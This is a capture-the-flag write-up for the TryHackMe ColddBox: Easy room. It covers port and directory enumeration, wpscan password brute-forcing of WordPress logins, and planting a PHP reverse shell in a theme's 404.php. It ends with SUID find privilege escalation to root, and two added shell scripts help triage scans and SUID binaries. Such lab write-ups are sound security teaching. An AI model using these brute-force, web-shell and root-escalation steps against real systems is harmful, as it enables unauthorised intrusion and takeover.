
ColddBox Easy WriteUp

This is my write-up for the ColddBox: Easy room on TryHackMe.

This room is a CTF-style room.

I will try to go deep into the technical details of what we do in this room.


Task 1 - boot2root

Enum

  • Always start by creating an nmap directory to store the scans
mkdir nmap

nmap -sC -sV -T4 -v -oN nmap/initial_scan $IP
## nmap scan result
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ColddBox | One more machine
|_http-generator: WordPress 4.1.31
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS

rustscan -a $IP -- -oN nmap/rustscan
## rustscan result
PORT STATE SERVICE REASON
80/tcp open http syn-ack
4512/tcp open unknown syn-ack
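As an added example (not part of the original write-up), a small POSIX shell script that reconciles the two scans: it pulls the open ports out of both outputs, prints the ones the default nmap scan missed, and builds the follow-up version scan for them. The two scan outputs embedded in it are constructed to mirror the results above, and the nmap/missed_ports output file name is my own choice.

```shell
#!/bin/sh
# Added example (not from the write-up): compare a default nmap scan (top 1000
# ports) with a full-range rustscan and emit the ports only the full scan saw,
# so they get a -sC -sV follow-up instead of being forgotten.

# Constructed sample outputs, shaped like the write-up's results.
NMAP_OUT='# Nmap 7.91 scan initiated
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ColddBox | One more machine'

RUSTSCAN_OUT='PORT     STATE SERVICE REASON
80/tcp   open  http    syn-ack
4512/tcp open  unknown syn-ack'

# open_ports OUTPUT: print the port numbers of lines shaped "N/tcp open ...",
# sorted numerically and de-duplicated.
open_ports() {
    printf '%s\n' "$1" |
        awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" { sub("/.*", "", $1); print $1 }' |
        sort -n -u
}

# missed_ports FIRST SECOND: ports open in SECOND that FIRST did not report.
missed_ports() {
    first=" $(open_ports "$1" | tr '\n' ' ') "
    open_ports "$2" | while read -r p; do
        case "$first" in
            *" $p "*) ;;           # both scans agree on this port
            *) echo "$p" ;;        # only the full-range scan saw it
        esac
    done
}

# followup_scan_cmd FIRST SECOND: build the targeted nmap command for the
# missed ports, or say that there were none. (File name nmap/missed_ports is
# an assumption for this example.)
followup_scan_cmd() {
    ports=$(missed_ports "$1" "$2" | paste -sd, -)
    if [ -z "$ports" ]; then
        echo "# full scan found no extra ports"
        return 0
    fi
    echo "nmap -sC -sV -p $ports -oN nmap/missed_ports \$IP"
}

# Demo when run directly.
followup_scan_cmd "$NMAP_OUT" "$RUSTSCAN_OUT"
```

The script only parses the two text outputs, so it runs offline; point it at the real files with `followup_scan_cmd "$(cat nmap/initial_scan)" "$(cat nmap/rustscan)"`.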
  • rustscan scans all 65535 TCP ports, which is why it also turned up 4512/tcp, a port the default nmap scan (top 1000 ports only) did not report; it is worth following that port up with a targeted nmap -sC -sV scan rather than leaving it as "unknown"
  • Since there is a web server running, we can brute-force directories with gobuster
gobuster dir -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gob_1.log
## Gobuster result
/wp-content (Status: 301) [Size: 317] [--> http://10.10.42.232/wp-content/]
/wp-includes (Status: 301) [Size: 318] [--> http://10.10.42.232/wp-includes/]
/wp-admin (Status: 301) [Size: 315] [--> http://10.10.42.232/wp-admin/]
/hidden (Status: 301) [Size: 313] [--> http://10.10.42.232/hidden/]
  • With this we can safely assume that they are running WordPress (nmap's http-generator line already said WordPress 4.1.31), so we can go over to http://$IP/wp-login.php to try to log in

  • From http://$IP/hidden we can find some potential usernames

The hidden page

c0ldd
hugo
philip

Foot hold

  • With these usernames we can brute-force the WordPress login with wpscan
tip

Put the potential usernames into a file called user.txt, one per line. wpscan's --url takes the site root; it finds wp-login.php itself.

wpscan --url http://$IP/ -U user.txt -P /usr/share/wordlists/rockyou.txt

[SUCCESS] - c0ldd / [REDACTED]
  • Log in to the web page and navigate to the theme editor at http://$IP/wp-admin/theme-editor.php

  • Paste the contents of php-reverse-shell into the 404.php template of the active theme (twentyfifteen here)

Don't forget

Remember to edit the $IP and $PORT variables in php-reverse-shell to match your listener

  • Set up a listener on that port and request http://$IP/wp-content/themes/twentyfifteen/404.php to trigger the callback

  • Upgrade the shell with python or python3

python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm

PrivEsc

  • Run the standard checks that we should always do: file capabilities and SUID binaries
getcap -r / 2>/dev/null
## result
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep


find / -uid 0 -perm -4000 -type f 2>/dev/null
## result
/bin/su
/bin/ping6
/bin/ping
/bin/fusermount
/bin/umount
/bin/mount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/find
/usr/bin/sudo
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
  • /usr/bin/find is the odd one out: it is not SUID on a stock install, and find can run arbitrary commands with -exec, so we can become root with it:

find . -exec /bin/sh -p \; -quit

The -p flag keeps the shell from dropping the effective uid back to the real one (bash does that by default when they differ), and -quit stops find after the first match. Check with id that euid=0(root) once the shell spawns.
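As an added example (not part of the original write-up), a POSIX shell script that triages the SUID list the way the step above does by eye: it compares each path against the set of binaries that ship SUID on a stock Ubuntu 16.04 install (that baseline is my assumption, not something the room states) and prints the GTFOBins-style command for the one that sticks out. The SUID list embedded in it is the find output above.

```shell
#!/bin/sh
# Added example (not from the write-up): triage a SUID-root listing against
# the binaries that are SUID on a stock Ubuntu 16.04 install so the unusual
# ones stand out. The baseline below is an assumption made for this example;
# adjust it for the target's distribution and release.

# Constructed input: the find output from the write-up, one path per line.
SUID_LIST='/bin/su
/bin/ping6
/bin/ping
/bin/fusermount
/bin/umount
/bin/mount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/find
/usr/bin/sudo
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper'

# Assumed baseline: what a default Ubuntu 16.04 ships SUID root.
STOCK_SUID='/bin/su /bin/ping6 /bin/ping /bin/fusermount /bin/umount /bin/mount
/usr/bin/chsh /usr/bin/gpasswd /usr/bin/pkexec /usr/bin/sudo /usr/bin/newgidmap
/usr/bin/newgrp /usr/bin/newuidmap /usr/bin/chfn /usr/bin/passwd
/usr/lib/openssh/ssh-keysign /usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic /usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/dbus-1.0/dbus-daemon-launch-helper'

# unusual_suid LIST: print the paths in LIST that are not in the baseline.
unusual_suid() {
    baseline=" $(printf '%s' "$STOCK_SUID" | tr '\n' ' ') "
    printf '%s\n' "$1" | while read -r path; do
        [ -z "$path" ] && continue
        case "$baseline" in
            *" $path "*) ;;          # expected on a stock install
            *) echo "$path" ;;       # worth a closer look
        esac
    done
}

# suid_shell_cmd PATH: for find, print the command that spawns a shell while
# keeping the effective uid. -p stops the shell from dropping euid 0 back to
# the caller's uid; -quit stops find after the first match. Other binaries
# return non-zero: no canned technique here.
suid_shell_cmd() {
    case "$1" in
        */find) printf '%s\n' "$1 . -exec /bin/sh -p \\; -quit" ;;
        *) return 1 ;;
    esac
}

# Demo when run directly: list the odd ones out and the command to try.
for bin in $(unusual_suid "$SUID_LIST"); do
    echo "unusual SUID binary: $bin"
    suid_shell_cmd "$bin" || echo "  (no canned technique for $bin)"
done
```

On a live target feed it the real listing, e.g. `unusual_suid "$(find / -uid 0 -perm -4000 -type f 2>/dev/null)"`, and still confirm with id that the spawned shell has euid=0(root).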

  • Getting all the flags

Get the flags
cat /home/c0ldd/user.txt /root/root.txt
[REDACTED]